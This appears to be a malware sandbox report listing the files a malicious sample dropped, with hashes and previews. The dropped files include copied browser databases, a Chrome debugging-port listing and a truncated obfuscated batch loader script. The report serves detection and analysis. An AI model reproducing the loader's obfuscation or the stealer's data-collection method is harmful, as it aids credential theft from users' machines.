Category:	dropped
Size (bytes):	8193
Entropy (8bit):	5.027484893998515
Encrypted:	false
SSDEEP:	96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
MD5:	2D6ACF2AEC5E5349B16581C8AE23BF3E
SHA1:	0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
SHA-256:	B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
SHA-512:	7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,

C:\ProgramData\2N7Y58YCJW47\GVA1VK

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.861537145678193
Encrypted:	false
SSDEEP:	48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
MD5:	6F0056EC818D4FC20158F3FF190D6D6A
SHA1:	9E2108FE560CC2187395C5EED011559D201CE45D
SHA-256:	2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
SHA-512:	72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -

C:\ProgramData\2N7Y58YCJW47\IEUKNO

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2N7Y58YCJW47\MYCBSR9RI

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2N7Y58YCJW47\O8GVASR9H

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2N7Y58YCJW47\OZ5XT2

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2N7Y58YCJW47\RIWTJE

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2829
Entropy (8bit):	5.130068712095974
Encrypted:	false
SSDEEP:	48:/2e8G+F0Vg8DIIgPdunPduPPduNJ7IgfCfikfidjikjirJu/MY4C5uXC5u/C5upL:/29F+cO0Mf7Rwiai5ieiFEMAQSQaQwX4
MD5:	CD55A48FE382A6820EC4FB55A66C2858
SHA1:	70A0A7B0E12DF915BD5E68FF0432637EFC2153DE
SHA-256:	97838AB994B53DFADEEF63955EECB05A7F118C2066EF97B0B0EB7BB48A526451
SHA-512:	37C6D78CCD807B04834659B5E796424C443B2C4F72481CB4080ED1BC5E6A954E47C4AF837A653DDAAFED2372C4FF60CE442170EA58586AB93C57B841449C5195
Malicious:	false
Preview:	<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. name="Microsoft-Windows-Crypto-keys".. version="0.0.0.0".. processorArchitecture="".. language="neutral".. />.. <migration scope="Upgrade,MigWiz,USMT" .. replacementVersionRange="6.0-6.1".. replacementSettingsVersionRange="0".. settingsVersion="0" .. >.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\RSA\[]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\DSS\[]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\Keys[]</pattern>.. </objectSet>.. </include>.. </rules>..

C:\ProgramData\2N7Y58YCJW47\TR9Z5X

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24008
Entropy (8bit):	6.062446965815151
Encrypted:	false
SSDEEP:	192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
MD5:	6AEAEBF650EFC93CD3B6670A05724FE8
SHA1:	A4FE07E6C678AC8D4DC095997DB5043668D103B4
SHA-256:	C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
SHA-512:	5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Setup.exe, Detection: malicious, Browse Filename: xoJxSAotVM.exe, Detection: malicious, Browse Filename: fim3BhyKXP.gif, Detection: malicious, Browse Filename: TMX.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: lem.exe, Detection: malicious, Browse Filename: ljwIPDSwFi.exe, Detection: malicious, Browse Filename: jE4zclRJU2.exe, Detection: malicious, Browse Filename: 5CG2133F5Y_2024-04-05_12_15_35.569.zip, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\2N7Y58YCJW47\UKX47G

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	10219
Entropy (8bit):	4.966520026409024
Encrypted:	false
SSDEEP:	96:NPgBOOzJMk67cY82SGrPVYRjDjXK2F6KJzLLwGXtXqWgrjj31jj6OzJMk67cY82s:UYwP62I+Wr3JjkwP62I+Ws
MD5:	381138FA1B1C4C298AD2441898677ED6
SHA1:	B8A0B0ECAAF6F3BBD7C27DD54ACD4BC3366DD0A4
SHA-256:	D4EE07BC2183E3D013B68B080B9E2F603676B27F8B0C95CCA2ED533BC671FAFA
SHA-512:	095C2B1C129C36125FE17ED096FDE58AE0F8AF61527D9AEDCAB379C3221BF09D87F28846E6FA3CF9FE05C750689A2ADFCDD1AB67409780A12A425A33219858EC
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. <assemblyIdentity.. buildType="release".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI-Component".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. optimizePatterns="no".. offlineApply="no".. replacementSettingsVersionRange="0".. replacementVersionRange="6.2-10.0".. scope="MigWiz,Upgrade".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. Downlevel settings -->.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultUserName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultDomainName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsof

C:\ProgramData\2N7Y58YCJW47\XLFUAS

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	889
Entropy (8bit):	5.016955029110262
Encrypted:	false
SSDEEP:	24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
MD5:	2948FF1C0804EC7DB473BB77EB3FBE4E
SHA1:	98A97AFC0E4E2B09A17AA0746F455DFD24356357
SHA-256:	2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
SHA-512:	8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\ [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	JSON data
Category:	dropped
Size (bytes):	1267
Entropy (8bit):	5.353001736289951
Encrypted:	false
SSDEEP:	24:OBfNaoCU9m0FA9m0TINePKllDCU9m0pRBfNaoCq7o0m7oABYpDCq7NBfNaoC6Kep:SfNaoCCsfTECCF/fNaoCqycCqPfNaoCw
MD5:	DEBE7626296899F72FAD5FBECCB76A1F
SHA1:	0F9B9100FB38213060C8FF1A7D99C51A15F1C5F7
SHA-256:	C72E0BE0EADAD304165119FF99BC90D3925BC2FE2C27771912FC49131BBBE6AE
SHA-512:	6DDF27771DB1578F432473AD9C1770A3750887566E2DB4E7C9BAFCB8CFD7823A7537947E4F0B828315564B2BDDD98ACCA91AA7C86D25DB2A6F532E0348F3177B
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9CF2C1EBCB2168A1BBB29B208DDED844",.. "id": "9CF2C1EBCB2168A1BBB29B208DDED844",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9CF2C1EBCB2168A1BBB29B208DDED844"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/534BC8FCC282FF1D709CDCDAE5935C33",.. "id": "534BC8FCC282FF1D709CDCDAE5935C33",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/534BC8FCC282FF1D709CDCDAE5935C33"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Setup.msi, Detection: malicious, Browse Filename: SET_UP.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: SET_UP.exe, Detection: malicious, Browse Filename: Set-Up.exe, Detection: malicious, Browse Filename: OR8Ti8rf8h.exe, Detection: malicious, Browse Filename: nanophanotool.exe, Detection: malicious, Browse Filename: 5y2VCFOB05.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\628056\u

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	369373
Entropy (8bit):	7.999479085447109
Encrypted:	true
SSDEEP:	6144:FJQdJwo8s+9cpRF3C9Wa84DAX33LxQ7rB1Wkstu7pKLwmmdW2kaVXF2HPHKr2GH:FJQsANZ4cX37xqds2QcmAKaVXF2vqr2G
MD5:	E805CD0F799D0AD76BDB49FAEF798D13
SHA1:	41C8D79A6727403BBBB9B0E8D98887A3A7A8D8CB
SHA-256:	B1F7C0ED244E054DD5EAE5FF022131ED9727543A4D0CDB6235C2D3723D2C4835
SHA-512:	77A7560377610E97A103EE51E1945ACE4673F80D6F57A2475E613729474C9EB047C7088650EDB20FAA3862C67E274074E1DCEDB3646BFB4E5A91AC9E77EF6139
Malicious:	false
Preview:	...NsRcjh...)H...=.q=+."..q.H..}...=/...=_X?...9U..]Q.d.,.h...G3..X.U.>'...>..#be... ..D.x....$8.@.[.w.5d..H.E.f,8f....R..>4.......-.g...QYQ..Q......./...b.]9.8.......V....\X.Z.FD.5.7....L.v..@.Uv....;..L..DE........d..&{[go.:...b....z........V..V.N..B...:.^.\|mBdqj..nn$y.......w=U.P.r...ZA.1.5. u.Y...).7t.....MR?.....}2....LM...,.zUA..]......?.B.........F..(..Q.\.....\....?t).../..p6.?BD...A.A.\..XF....[5.......?%.'...O.">..........V:.zj.'.....6...E`W..W..O.7m....7.?.?.k..c....6...`c".....J....K.1o.!in.Rt0..ekl.....,.(Q!u.v.JX..a.x.......18...........L.N.!o......T........B...2.r..$.}... ^..s...=.)..2.K...Q3`.....R....T:oN.R.<2:`._.....\|}.^M.o...I. .8...W.Z....C...i...YU...*..>.:?.'.`....#.@T.,B....V....,.`.5..G_.W....6........4D..Dk..?T..@.....y..-n..[.)$.D.X..y......G2.sF.....Om......t.!..j[...A.^.>.;...6'5P?..A....0.D%%"%.....;..d!.Q..SMm......z.$.......(.AD...]....D[=..TQ,..j.g.#.K`..6...(..."=6sr.<..ak.m.W..e]`.m.w....}.H..g.].m.f.J...H

C:\Users\user\AppData\Local\Temp\Admission

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	93184
Entropy (8bit):	6.160455964027194
Encrypted:	false
SSDEEP:	1536:AFfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWccd0U:AFfTut/Dde6u640ewy4Za9coRC2jfTqH
MD5:	7E00B549662A27E8F4A9DC5F950FD8E7
SHA1:	ECBC302511819C0AF9BF7B990AA3623873AE2A2A
SHA-256:	811039F826716917239C503F5797ABA4B57880E700B102F8C202DF9CA4C2AC37
SHA-512:	C110B335341F09FF06E8AD0558E495356EE83452BE570BA60417859A2F371876D9F760E265F2146E42E328402336B96324DFE2B79CA494A5A77D926A169C72A1
Malicious:	false
Preview:	......j.;.u.3.SSSSj...3.SSSSj.V....I._^3.[]...U..SVW.}...W.o...3..CS........>y...Q..\|2...L2.t..I8..A..\|2...D2.t..@8.@...u....V....&..^..;.G..H..0...........@u.S....Au.j..L.....P.1.. .I............_^3.[]...U..SV.u.WV.......3..CS.........yM...Q..\|:...L:.t..I8..A..\|:...D:.t..@8.@...!.F..p.....\........j..v.......u..u.......&..^._^3.[]...U..SV.u.W...N..I..Y....F..H..N......V.]..(...j....\|......By...I..\|9...T9.t..R8..B..\|9...D9.t..@8.@...u.........&..F......G......j.0V..\.I.........r...t.3.Pj.V..@.I.....Pj.V..@.I.j..u.j.V....I._^3.[]...U..V.u........Q.E..E.....P...H.......j.............<......@..L0..\|0..^t..I8Q.M....3.]...U..V.u....w...Q.E..E.....P...H....S...j...................@..L0..\|0..^t..I8Q.M..+...3.]...U..V.u........Q.E..E.....P...H........j..................@..L0..\|0..^t..I8Q.M.....3.]...U..V.u.......Q.E..E.....P...H.......j.............(......@..L0..\|0..^t..I8Q.M..s...3.]...SVWj....j.......0y*...y..\|7...L7.t..I8..A..\|7...D7.t..@8.@.....+..4.I.......3.B..

C:\Users\user\AppData\Local\Temp\Appeals

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	4.144986056310104
Encrypted:	false
SSDEEP:	768:BKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3z:BKaj6iTcPAsAhxjgarB/5el3z
MD5:	7E6A03C749F54958AB60313137E6610E
SHA1:	9F62D8F217558154E2DB9C970C1257C8E16DB6BD
SHA-256:	CC3F1B74CF6DD7C88D42F5B29E089F1937613F8BB6E2274A94E7461B55795FF0
SHA-512:	E555FA28C97E3618C6AC5903F735AC6919D69528F8A53E5DC0B3B546451A92C7797BC3945E60FCEE1A6550DB5C3E315C91DAE8FF94B1C0E1873EBB86AD38D085
Malicious:	false
Preview:	........................................................................r.......................................................................................................................................................r.r.r.r.r.....................................................................................r...................................................................................r.............................................................................................................................................................................................................................................................................................................................r.r.....................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Breakfast

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	6.5722629420970895
Encrypted:	false
SSDEEP:	1536:in+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bU:i+AqVnBypIbv18mLthfhnueoMmOqDoig
MD5:	84B74DA383C7061D1F67A002DD8C47F7
SHA1:	DC909E77B77059D86FD7FA99471F93029DD66A2F
SHA-256:	1C9B9CC68B82CFC34B542CFDB143A9EAA6F63EC17065DF8608EAE27F8A667579
SHA-512:	C09F0665456327859DC89C93C5D55289AFDF9657A226304D4871ED4C02DC26B8DDB7747941F136FD854C5A754E37299EB808288F80ABDF75CE1B0BF83AC82DE4
Malicious:	false
Preview:	J..2S....P......P.....u......1...>3._.F.....^[....U..V.u....W.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..\|1...D1.t..@8.P..\|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..\|....T..t..R83.C.Z..\|....T..t..R8.u....B.......3..^..>.Q.....(

C:\Users\user\AppData\Local\Temp\Cheats

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	ASCII text, with very long lines (664), with CRLF line terminators
Category:	dropped
Size (bytes):	16713
Entropy (8bit):	5.13717215388457
Encrypted:	false
SSDEEP:	384:TJpziSlvMGEoGA4CW1Shn9YeMNW8UGCTnUJ+9D7IEJ2Qxi1D:flkV7A4w9tMM8UGqUJtE0Qxi1D
MD5:	DC0C5150CCFAA34C9472DF04D06B401E
SHA1:	F7929242A75E8C48E0FD6FAF8688D2267A35F518
SHA-256:	6A0790F679AEC429C210B455605E4169612C1371CC2CBABA0848CD788CF4D851
SHA-512:	772F2826F31D04451D2774E9EF987C15E45C45309349FBE9EE7B130F46FB61DC428921D168FEADD74DA8DFA26C855B2C3831210B3511048B0966F1F4334472CD
Malicious:	false
Preview:	Set Financing=I..ptNBull-Architectural-Languages-Bring-Cool-Reliance-..iCXIon-Investigator-..owXhDisciplinary-Faq-Eyed-..ehLeads-Belgium-Subject-..CfValentine-Threatened-Restoration-..SmKinase-Procurement-Cube-Told-..Set Pink=t..qmiEquipped-Verizon-Increases-Newer-Eg-Compromise-Plenty-Intel-..EELNike-Affected-..zjPharmaceuticals-Ja-..hsMovers-Televisions-..AmDDelivery-Awareness-Complaint-Preserve-Honors-Discussed-Miracle-Gabriel-..FJCombination-..Set Answering=H..vupEqually-Islands-..usAbilities-Updated-Rarely-Denial-Bidding-Dirt-Checked-..XoOFiscal-Optimal-Vast-Further-Affected-Wants-..RRThong-Edge-..HAUWhen-Synopsis-Becoming-..VqBuried-Kathy-Milan-Apollo-Sheer-..ghUSaudi-Mileage-Detection-Unity-Infinite-Eric-Usa-Lenses-..Set Launched=5..JMdMedieval-Mind-Foul-Infection-Baths-Efforts-..IwRComplicated-Metals-Preserve-Forever-Genes-Demonstrates-Ltd-Delhi-Envelope-..nVuEBritannica-Ff-Federation-Lakes-Romance-Porsche-Subsection-Balanced-..eVsQDefinitely-Letters-Assure-Avenue-Zdnet-Agents-S

C:\Users\user\AppData\Local\Temp\Cheats.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (664), with CRLF line terminators
Category:	dropped
Size (bytes):	16713
Entropy (8bit):	5.13717215388457
Encrypted:	false
SSDEEP:	384:TJpziSlvMGEoGA4CW1Shn9YeMNW8UGCTnUJ+9D7IEJ2Qxi1D:flkV7A4w9tMM8UGqUJtE0Qxi1D
MD5:	DC0C5150CCFAA34C9472DF04D06B401E
SHA1:	F7929242A75E8C48E0FD6FAF8688D2267A35F518
SHA-256:	6A0790F679AEC429C210B455605E4169612C1371CC2CBABA0848CD788CF4D851
SHA-512:	772F2826F31D04451D2774E9EF987C15E45C45309349FBE9EE7B130F46FB61DC428921D168FEADD74DA8DFA26C855B2C3831210B3511048B0966F1F4334472CD
Malicious:	false
